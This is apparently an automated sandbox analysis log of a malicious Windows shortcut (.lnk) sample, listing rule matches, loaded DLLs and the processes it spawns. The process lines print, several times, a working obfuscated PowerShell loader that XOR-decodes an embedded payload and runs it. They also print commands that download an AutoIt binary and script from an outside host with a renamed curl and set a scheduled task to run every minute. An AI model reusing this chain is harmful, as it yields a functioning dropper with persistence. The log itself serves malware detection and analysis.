Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E90E40 12_2_00007FF700E90E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E7F810 12_2_00007FF700E7F810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E80804 12_2_00007FF700E80804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E9473C 12_2_00007FF700E9473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E50F28 12_2_00007FF700E50F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E4C719 12_2_00007FF700E4C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E688D8 12_2_00007FF700E688D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E67888 12_2_00007FF700E67888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E7D884 12_2_00007FF700E7D884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E44860 12_2_00007FF700E44860
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DA1E80 appears 69 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E555C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DA50B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E55658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DA5658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DB1F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E550B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E4A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DA55C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DB1FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E54FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E61FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E61F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1D9A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF7F1DA4FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: String function: 00007FF700E51E80 appears 69 times
Source: knfV5IVjEV.lnk, type: SAMPLE Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: amsi64_7732.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.evad.winLNK@25/11@1/2
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1D93434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 8_2_00007FF7F1D93434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\knfV5IVjEV
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: knfV5IVjEV.lnk ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk Virustotal: Detection: 29%
Source: GSlLzFnTov.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c 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||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c 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||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
